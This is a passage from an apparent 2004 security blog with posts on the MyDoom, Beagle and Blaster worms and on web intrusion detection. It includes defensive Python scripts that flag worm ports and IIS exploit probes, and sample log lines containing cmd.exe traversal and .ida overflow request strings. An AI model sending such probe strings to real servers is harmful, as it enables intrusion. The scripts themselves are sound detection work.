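The daemon only ever needs the destination port and source address of each attempt, which is exactly what a firewall log of dropped packets gives you, so the knock ports themselves can stay closed. As the caveat above says, this adds a hurdle for scanners, not a credential: anyone watching the wire learns the sequence.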

Post ID: 264, posted by jase at 11:39 PM
Permalink | Post / View Comments (1) | TrackBack ID: 239, (0) | Google Search

Saturday, February 7, 2004

Infosec Europe 2004

It's about time to pre-register for this event if you are planning on going, because it is free at the moment. If you turn up on the day you will have to pay. I've registered every year for the past however many and not actually got round to going. But this year, I will make it.

There will be a lot of companies there showing off their new products and also lots of different seminars to visit. I've already registered, so now just got to wait for the pack to come through.

Infosec Europe 2004

Post ID: 263, posted by jase at 06:27 PM
Permalink | Post / View Comments (0) | TrackBack ID: 238, (3) | Google Search

Thursday, January 29, 2004

MyDoom-B in the wild

Various sites are reporting that there is a new variant of the MyDoom worm in the wild and spreading on the Internet. This version appears to attack both SCO.COM and MICROSOFT.COM, but details are limited at the moment. It has probably been developed by the same author as the original. I'm assuming (even though you should never assume) that the attack will start on the same date, but we'll have to wait for more information to filter through.

Looks like it is going to be a bit gloomy for MS and SCO - the question is - will their sites hold up?

Tuesday, January 27, 2004

Novarg aka MyDoom

Yet another Windows based mass mailing email worm appears to be out there. This one looks like it's going to cause issues for SCO's website between February 1st and 12th by flooding it with GET requests. Users should check for the file "shimgapi.dll" on their systems. Ports 3127-3198 are opened up as a backdoor, so blocking these ports at the firewall would be a good idea.

Check out the Symantec Analysis
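The MyDoom backdoor ports above, Dabber's use of Sasser's FTP port 5554 and its own backdoor on 9898, and Mitglieder's SMTP proxy on 35555 are all things a perimeter firewall log already shows you, if something reads it. The following is an added example, not code from this post or from Symantec: it runs those port signatures over firewall log lines, separates hosts that merely got probed from hosts that accepted a connection on a worm port, and picks out sources that hit the same worm port on several hosts, which is what a worm looking for victims looks like. The log line layout and the sample lines are constructed for the example and do not match any particular vendor's format.

```python
import re
from collections import defaultdict

# TCP ports named in the Dabber, Mitglieder and MyDoom write-ups.
PORT_SIGNATURES = {
    5554: "Sasser FTP server (what Dabber scans for)",
    9898: "Dabber backdoor",
    35555: "Mitglieder SMTP proxy",
}
MYDOOM_BACKDOOR = range(3127, 3199)          # 3127-3198 inclusive

# Assumed line layout, constructed for this example (not a real device's format):
#   <date> <time> <ACCEPT|DROP> <src_ip>:<src_port> -> <dst_ip>:<dst_port>
LINE_RE = re.compile(
    r"^(\S+ \S+) (ACCEPT|DROP) (\d+\.\d+\.\d+\.\d+):(\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+)$")

SAMPLE_LOG = """\
2004-05-14 16:01:02 DROP 10.0.0.7:1043 -> 10.0.1.10:5554
2004-05-14 16:01:02 DROP 10.0.0.7:1044 -> 10.0.1.11:5554
2004-05-14 16:01:03 DROP 10.0.0.7:1045 -> 10.0.1.12:5554
2004-05-14 16:01:03 ACCEPT 10.0.0.7:1046 -> 10.0.1.13:5554
2004-05-14 16:02:10 ACCEPT 10.0.0.9:2001 -> 10.0.1.13:9898
2004-05-14 16:03:00 ACCEPT 10.0.0.9:2002 -> 10.0.1.20:3127
2004-05-14 16:03:05 DROP 192.0.2.44:5000 -> 10.0.1.20:35555
2004-05-14 16:03:07 ACCEPT 10.0.0.5:3344 -> 10.0.1.2:80
"""


def classify_port(port):
    """Name of the worm component associated with a destination port, or None."""
    if port in PORT_SIGNATURES:
        return PORT_SIGNATURES[port]
    if port in MYDOOM_BACKDOOR:
        return "MyDoom backdoor"
    return None


def parse_line(line):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, action, src, _sport, dst, dport = m.groups()
    return {"ts": ts, "action": action, "src": src, "dst": dst, "dport": int(dport)}


def analyse(lines, scan_threshold=3):
    """Return (alerts, scanners).

    alerts:   (ts, action, src, dst, dport, label) for every line aimed at a worm port.
    scanners: (src, label, distinct_targets) for sources that hit the same worm port on
              at least scan_threshold different hosts, i.e. something hunting for victims.
    """
    alerts = []
    targets = defaultdict(set)
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        label = classify_port(ev["dport"])
        if label is None:
            continue
        alerts.append((ev["ts"], ev["action"], ev["src"], ev["dst"], ev["dport"], label))
        targets[(ev["src"], label)].add(ev["dst"])
    scanners = sorted((src, label, len(dsts))
                      for (src, label), dsts in targets.items() if len(dsts) >= scan_threshold)
    return alerts, scanners


def accepted_victims(alerts):
    """Hosts that accepted a connection on a worm port: likely already infected, isolate and clean."""
    return sorted({dst for _, action, _, dst, _, _ in alerts if action == "ACCEPT"})


if __name__ == "__main__":
    alerts, scanners = analyse(SAMPLE_LOG.splitlines())
    for ts, action, src, dst, dport, label in alerts:
        print(ts, action, src, "->", "%s:%d" % (dst, dport), label)
    print("scanners:", scanners)
    print("accepted on worm ports:", accepted_victims(alerts))
```

A DROP against a worm port tells you which sources are infected and scanning; an ACCEPT tells you which internal hosts are listening on one, and those are the ones to pull off the network first.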

Post ID: 250, posted by jase at 12:22 PM
Permalink | Post / View Comments (0) | TrackBack ID: 225, (0) | Google Search

Tuesday, January 20, 2004

Damn, what was my login?!

Over the past 6 years of my Internet use, I have signed up to a lot of services. Most which I usually forget about and don't use, but at some point will come back to. Providing the accounts have not been deleted for non use over long periods of time, there is still the case of having to remember login details.

It's even more trouble when I can't remember which email address I used to register, so that I can have my password mailed to me. Maybe I should employ some sort of account management so these troubles are reduced when I do return to use a service after a long break.

I'm sure I'm not alone in having these issues. It would be a lot easier if we all used the same user IDs and passwords for the various services we use, but of course we don't do this, for obvious reasons. Which is where management comes in. Or doesn't, due to lack of motivation.

Sometimes it ends up in an email to support to find out various details.
All is not lost, it just takes a little time, but if the effort had been put in initially the extra effort would not be needed now. An interesting point to note when thinking along the lines of "I'll do it later": make the better (read: right) choice and do it now.

Post ID: 242, posted by jase at 11:40 PM
Permalink | Post / View Comments (0) | TrackBack ID: 217, (3) | Google Search

Monday, January 19, 2004

W32.Beagle.A@mm

Various sites are reporting on a new email based worm called Bagle. Of course, it follows the pattern we already know; in other words, it only affects Windows users and you do have to open an attachment. It appears that the email comes with a subject of "Test" and in the body of the message are the words "Test, yep." However, this information could be variable.

It appears to add this key to the registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"d3update.exe"="%system%\bbeagle.exe"

And copies itself to the system directory under the filename "bbeagle.exe".
It also runs "calc.exe" and then attempts to download "TrojanProxy.Win32.Mitgleide" from a number of sites and execute it. It scans local disks for email addresses, which it then sends itself to using a built in SMTP engine.

With an expiry date of 28th January, I doubt it will cause much of an issue. But even so, update your anti-virus patterns and don't open attachments from unknown senders, or indeed any attachment that looks suspect.

For more information, see one of the antivirus vendors' sites.

Post ID: 240, posted by jase at 05:55 PM
Permalink | Post / View Comments (0) | TrackBack ID: 215, (0) | Google Search

Friday, December 26, 2003

Blaster still on the prowl

Well it seems that even after the efforts by ISPs to limit the effects of Blaster, there are still paths for infected machines to scan and spread the worm.

You may recall my recent problems with installing Windows 2000 Professional on the new box for my brother. I'm not sure what was causing the problem with the .SIF file that it was talking about, as I could not locate any .SIF file.

Anyway, instead of messing about with that I decided to install Windows XP Professional, since it did not really make any difference. Although maybe I should have installed Linux and let him play with that. He's only just getting into the PC thing (age 13) so I could have made him start off on the right foot.

After getting XP installed and the box online, I got some updates installed from Windows Update, but not everything, as he wanted to play. Okay, I thought, I'll come back later and sort everything else out, so I moved the box through to his room and got it all up and running. When installing antivirus later, it informed me that Blaster was present.

I noticed when I had the box online in my room that the RPC service failed and the system rebooted, as that is the default action when RPC fails. I didn't think anything of it. After some reading, I found that RPC can crash when an infected box is trying to exploit the vulnerability, so it must have been exploited then.

Shortly after using the removal tool from Symantec and then finishing off the updates, all was good. Now I've got round to sorting the firewall, there should be no more issues.

I just need to configure stuff on the system now. But all seems okay!
I've learnt though: when getting a Windows system online and getting it all updated, do it all at once, straight away!

Post ID: 210, posted by jase at 11:20 PM
Permalink | Post / View Comments (0) | TrackBack ID: 187, (4) | Google Search

Monday, December 1, 2003

.Name registry site defaced

The web site defacements are still taking place, obviously, even though there are not as many sites mirroring all of them as there used to be. This time it's the turn of the .name registry.

Let us hope that they now increase security and are more aware of it so something like this does not happen again, else they will be a laughing stock!

Post ID: 182, posted by jase at 09:31 AM
Permalink | Post / View Comments (0) | TrackBack ID: 160, (5) | Google Search

Monday, November 3, 2003

Apache: mod_security

Just reading Ben's Thought Crimes, I noticed his post about mod_security for Apache. There were recently some security problems with it, but they have now been fixed. It seems like a good idea and an addition to any conventional IDS, like Tripwire for example. It's interesting to see how many Windows vulnerabilities (HTTP based, etc.) are tried on *nix servers, and also how many old exploits are still tried. The random scanning and exploit attempts by various tools against systems continue, so HTTP based IDS has a market there.
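The point about Windows exploits being thrown at *nix web servers is easy to see in any access log. The following is an added example, not code from this post or from mod_security: it classifies Apache common-log-format requests against a handful of signatures for IIS and old CGI probes and counts them per client, which is the kind of thing an HTTP-level IDS does before deciding to block. The signature list and the log lines are constructed for the example; the addresses are documentation ranges.

```python
import re
from collections import Counter

# Probes that only make sense against IIS/Windows or long-dead CGI scripts, yet fill *nix web logs.
# Constructed/assumed list for this example; a real rule set would be far longer.
PROBES = [
    (re.compile(r"^/default\.ida\?", re.I), "Code Red style .ida overflow"),
    (re.compile(r"cmd\.exe|root\.exe", re.I), "IIS traversal / Nimda command shell"),
    (re.compile(r"%c0%af|%c1%1c|%255c|\.\./", re.I), "directory traversal"),
    (re.compile(r"^/_vti_bin/", re.I), "FrontPage extensions probe"),
    (re.compile(r"^/msadc/", re.I), "IIS RDS (msadcs.dll) probe"),
    (re.compile(r"formmail", re.I), "FormMail open relay scan"),
]

# Apache common log format: host ident user [time] "request" status size
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Constructed sample lines, not from a real server.
SAMPLE_LOG = """\
192.0.2.1 - - [03/Nov/2003:10:12:01 +0000] "GET /default.ida?XXXXXXXXXXXXXXXX%u9090%u6858 HTTP/1.0" 404 276
192.0.2.1 - - [03/Nov/2003:10:12:02 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 280
198.51.100.4 - - [03/Nov/2003:10:15:30 +0000] "GET /index.html HTTP/1.1" 200 1043
198.51.100.4 - - [03/Nov/2003:10:15:31 +0000] "GET /_vti_bin/owssvr.dll?UL=1&ACT=4 HTTP/1.1" 404 291
203.0.113.7 - - [03/Nov/2003:10:20:00 +0000] "POST /cgi-bin/formmail.pl HTTP/1.0" 404 290
203.0.113.7 - - [03/Nov/2003:10:20:01 +0000] "GET /images/logo.png HTTP/1.1" 200 5120
"""


def classify_request(path):
    """Return the label of the first matching probe signature for a request path, or None."""
    for pattern, label in PROBES:
        if pattern.search(path):
            return label
    return None


def parse_clf(line):
    m = CLF_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status, _size = m.groups()
    return {"ip": ip, "ts": ts, "method": method, "path": path, "status": int(status)}


def scan_log(lines):
    """Return (hits, per_source): every probe seen, and how many probes each client IP sent."""
    hits, per_source = [], Counter()
    for line in lines:
        req = parse_clf(line)
        if req is None:
            continue
        label = classify_request(req["path"])
        if label is None:
            continue
        hits.append((req["ip"], req["method"], req["path"], req["status"], label))
        per_source[req["ip"]] += 1
    return hits, per_source


if __name__ == "__main__":
    hits, per_source = scan_log(SAMPLE_LOG.splitlines())
    for ip, method, path, status, label in hits:
        print("%-14s %s %s -> %d  [%s]" % (ip, method, path, status, label))
    print("probes per source:", dict(per_source))
```

Every probe here drew a 404, which is the usual picture on a *nix box: the requests are harmless to the server but are a reliable sign of which sources are running automated exploit tools, and a source that sends several in quick succession is a good candidate for a firewall rule.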

Post ID: 141, posted by jase at 10:39 PM
Permalink | Post / View Comments (0) | TrackBack ID: 127, (0) | Google Search